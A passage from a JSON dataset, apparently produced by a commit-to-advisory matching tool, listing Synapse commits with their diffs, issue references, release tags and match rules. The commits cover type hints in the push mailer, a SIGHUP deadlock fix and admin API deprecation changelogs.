validation link to", + "+ email_address: Email address we're sending the validation link to", + "- token (str): Unique token generated by the server to verify the email was received", + "+ token: Unique token generated by the server to verify the email was received", + "- client_secret (str): Unique token generated by the client to group together", + "+ client_secret: Unique token generated by the client to group together", + " multiple email sending attempts", + "- sid (str): The generated session ID", + "+ sid: The generated session ID", + " \"\"\"", + "@@ -196,4 +212,9 @@ class Mailer:", + " async def send_notification_mail(", + "- self, app_id, user_id, email_address, push_actions, reason", + "- ):", + "+ self,", + "+ app_id: str,", + "+ user_id: str,", + "+ email_address: str,", + "+ push_actions: Iterable[Dict[str, Any]],", + "+ reason: Dict[str, Any],", + "+ ) -> None:", + " \"\"\"Send email regarding a user's room notifications\"\"\"", + "@@ -205,3 +226,3 @@ class Mailer:", + "- notifs_by_room = {}", + "+ notifs_by_room = {} # type: Dict[str, List[Dict[str, Any]]]", + " for pa in push_actions:", + "@@ -264,3 +285,5 @@ class Mailer:", + "- async def send_email(self, email_address, subject, extra_template_vars):", + "+ async def send_email(", + "+ self, email_address: str, subject: str, extra_template_vars: Dict[str, Any]", + "+ ) -> None:", + " \"\"\"Send an email with the given information and template text\"\"\"", + "@@ -317,4 +340,9 @@ class Mailer:", + " async def get_room_vars(", + "- self, room_id, user_id, notifs, notif_events, room_state_ids", + "- ):", + "+ self,", + "+ room_id: str,", + "+ user_id: str,", + "+ notifs: Iterable[Dict[str, Any]],", + "+ notif_events: Dict[str, EventBase],", + "+ room_state_ids: StateMap[str],", + "+ ) -> Dict[str, Any]:", + " # Check if one of the notifs is an invite event for the user.", + "@@ -336,3 +364,3 @@ class Mailer:", + " \"link\": self.make_room_link(room_id),", + "- }", + "+ } # type: Dict[str, Any]", + "@@ -367,3 +395,9 @@ class Mailer:", + "- async def get_notif_vars(self, notif, user_id, notif_event, room_state_ids):", + "+ async def get_notif_vars(", + "+ self,", + "+ notif: Dict[str, Any],", + "+ user_id: str,", + "+ notif_event: EventBase,", + "+ room_state_ids: StateMap[str],", + "+ ) -> Dict[str, Any]:", + " results = await self.store.get_events_around(", + "@@ -393,3 +427,5 @@ class Mailer:", + "- async def get_message_vars(self, notif, event, room_state_ids):", + "+ async def get_message_vars(", + "+ self, notif: Dict[str, Any], event: EventBase, room_state_ids: StateMap[str]", + "+ ) -> Optional[Dict[str, Any]]:", + " if event.type != EventTypes.Message and event.type != EventTypes.Encrypted:", + "@@ -434,3 +470,5 @@ class Mailer:", + "- def add_text_message_vars(self, messagevars, event):", + "+ def add_text_message_vars(", + "+ self, messagevars: Dict[str, Any], event: EventBase", + "+ ) -> None:", + " msgformat = event.content.get(\"format\")", + "@@ -447,11 +485,14 @@ class Mailer:", + "- return messagevars", + "-", + "- def add_image_message_vars(self, messagevars, event):", + "+ def add_image_message_vars(", + "+ self, messagevars: Dict[str, Any], event: EventBase", + "+ ) -> None:", + " messagevars[\"image_url\"] = event.content[\"url\"]", + "- return messagevars", + "-", + " async def make_summary_text(", + "- self, notifs_by_room, room_state_ids, notif_events, user_id, reason", + "+ self,", + "+ notifs_by_room: Dict[str, List[Dict[str, Any]]],", + "+ room_state_ids: Dict[str, StateMap[str]],", + "+ notif_events: Dict[str, EventBase],", + "+ user_id: str,", + "+ reason: Dict[str, Any],", + " ):", + "@@ -582,3 +623,3 @@ class Mailer:", + "- def make_room_link(self, room_id):", + "+ def make_room_link(self, room_id: str) -> str:", + " if self.hs.config.email_riot_base_url:", + "@@ -592,3 +633,3 @@ class Mailer:", + "- def make_notif_link(self, notif):", + "+ def make_notif_link(self, notif: Dict[str, str]) -> str:", + " if self.hs.config.email_riot_base_url:", + "@@ -608,3 +649,5 @@ class Mailer:", + "- def make_unsubscribe_link(self, user_id, app_id, email_address):", + "+ def make_unsubscribe_link(", + "+ self, user_id: str, app_id: str, email_address: str", + "+ ) -> str:", + " params = {", + "@@ -622,3 +665,3 @@ class Mailer:", + "-def safe_markup(raw_html):", + "+def safe_markup(raw_html: str) -> jinja2.Markup:", + " return jinja2.Markup(", + "@@ -637,3 +680,3 @@ def safe_markup(raw_html):", + "-def safe_text(raw_text):", + "+def safe_text(raw_text: str) -> jinja2.Markup:", + " \"\"\"", + "@@ -657,3 +700,3 @@ def deduped_ordered_list(it: Iterable[T]) -> List[T]:", + "-def string_ordinal_total(s):", + "+def string_ordinal_total(s: str) -> int:", + " tot = 0" + ], + "changed_files": [ + "changelog.d/8882.misc", + "mypy.ini", + "synapse/push/mailer.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8882": "Add type hints to the push module. #8901 Convert internal pusher dicts to attrs #8940" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8882, 8882", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8882", + "relevance": 2 + } + ] + }, + { + "commit_id": "80a992d7b953ea58dd45913d68855e396ad4d980", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607619365, + "hunks": 3, + "message": "Fix deadlock on SIGHUP (#8918) Fixes #8892", + "diff": [ + "diff --git a/changelog.d/8918.bugfix b/changelog.d/8918.bugfix", + "new file mode 100644", + "index 000000000..ae0f6745d", + "--- /dev/null", + "+++ b/changelog.d/8918.bugfix", + "@@ -0,0 +1 @@", + "+Fix occasional deadlock when handling SIGHUP.", + "diff --git a/synapse/app/_base.py b/synapse/app/_base.py", + "index 895b38ae7..37ecdbe3d 100644", + "--- a/synapse/app/_base.py", + "+++ b/synapse/app/_base.py", + "@@ -247,2 +247,4 @@ def start(hs: \"synapse.server.HomeServer\", listeners: Iterable[ListenerConfig]):", + "+ reactor = hs.get_reactor()", + "+", + " @wrap_as_background_process(\"sighup\")", + "@@ -262,3 +264,5 @@ def start(hs: \"synapse.server.HomeServer\", listeners: Iterable[ListenerConfig]):", + " def run_sighup(*args, **kwargs):", + "- hs.get_clock().call_later(0, handle_sighup, *args, **kwargs)", + "+ # `callFromThread` should be \"signal safe\" as well as thread", + "+ # safe.", + "+ reactor.callFromThread(handle_sighup, *args, **kwargs)" + ], + "changed_files": [ + "changelog.d/8918.bugfix", + "synapse/app/_base.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8918": "", + "8892": "Fix deadlock on SIGHUP #8918" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8918, 8918", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8918, 8892", + "relevance": 2 + } + ] + }, + { + "commit_id": "43bf3c51780a299becde91027e73259eb77b039f", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607530797, + "hunks": 1, + "message": "Combine related media admin API docs (#8839) Related: #8810 Also a few small improvements. Signed-off-by: Dirk Klimpel dirk@klimpel.org", + "diff": [ + "diff --git a/changelog.d/8839.doc b/changelog.d/8839.doc", + "new file mode 100644", + "index 000000000..c35c59a76", + "--- /dev/null", + "+++ b/changelog.d/8839.doc", + "@@ -0,0 +1 @@", + "+Combine related media admin API docs.", + "\\ No newline at end of file" + ], + "changed_files": [ + "changelog.d/8839.doc" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8839": "", + "8810": "Deprecate and remove the Shutdown Room Admin API in favour of the Delete Room API #8663 Deprecate Shutdown Room and Purge Room Admin API #8829 Remove deprecated Shutdown Room and Purge Room Admin API #8830 Combine related media admin API docs #8839" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8839, 8839", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8839, 8810", + "relevance": 2 + } + ] + }, + { + "commit_id": "a5f7aff5e5a840c53e79d185d40b22d67dad2ea1", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607600568, + "hunks": 1, + "message": "Deprecate Shutdown Room and Purge Room Admin API (#8829) Deprecate both APIs in favour of the Delete Room API. Related: #8663 and #8810", + "diff": [ + "diff --git a/changelog.d/8829.removal b/changelog.d/8829.removal", + "new file mode 100644", + "index 000000000..2f3708218", + "--- /dev/null", + "+++ b/changelog.d/8829.removal", + "@@ -0,0 +1 @@", + "+Deprecate Shutdown Room and Purge Room Admin APIs." + ], + "changed_files": [ + "changelog.d/8829.removal" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8829": "Remove deprecated Shutdown Room and Purge Room Admin API #8830 Combine related admin API docs #8810 Switch shutdown_room to delete room API matrix-org/sytest#988 Deprecate and remove the Shutdown Room Admin API in favour of the Delete Room API #8663 Replace shutdown_room and purge_room APIs with delete_room matrix-org/mjolnir#76 remove purge_room and shutdown_room #9052", + "8663": "Allow shutdowns of rooms using the admin api without replacement rooms #8662 Add a way to close/shutdown room as room admin #8717 Deprecate Shutdown Room and Purge Room Admin API #8829 Remove deprecated Shutdown Room and Purge Room Admin API #8830", + "8810": "Deprecate and remove the Shutdown Room Admin API in favour of the Delete Room API #8663 Deprecate Shutdown Room and Purge Room Admin API #8829 Remove deprecated Shutdown Room and Purge Room Admin API #8830 Combine related media admin API docs #8839" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8829, 8829", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8829, 8663, 8810", + "relevance": 2 + } + ] + }, + { + "commit_id": "b3a4b53587108af7c58acc45a0441304689f3ac9", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608046894, + "hunks": 12, + "message": "Fix handling of stream tokens for push. (#8943) Removes faulty assertions and fixes the logic to ensure the max stream token is always set.", + "diff": [ + "diff --git a/changelog.d/8943.misc b/changelog.d/8943.misc", + "new file mode 100644", + "index 000000000..4ff0b94b9", + "--- /dev/null", + "+++ b/changelog.d/8943.misc", + "@@ -0,0 +1 @@", + "+Add type hints to push module.", + "diff --git a/synapse/push/__init__.py b/synapse/push/__init__.py", + "index 3d2e87483..ad07ee86f 100644", + "--- 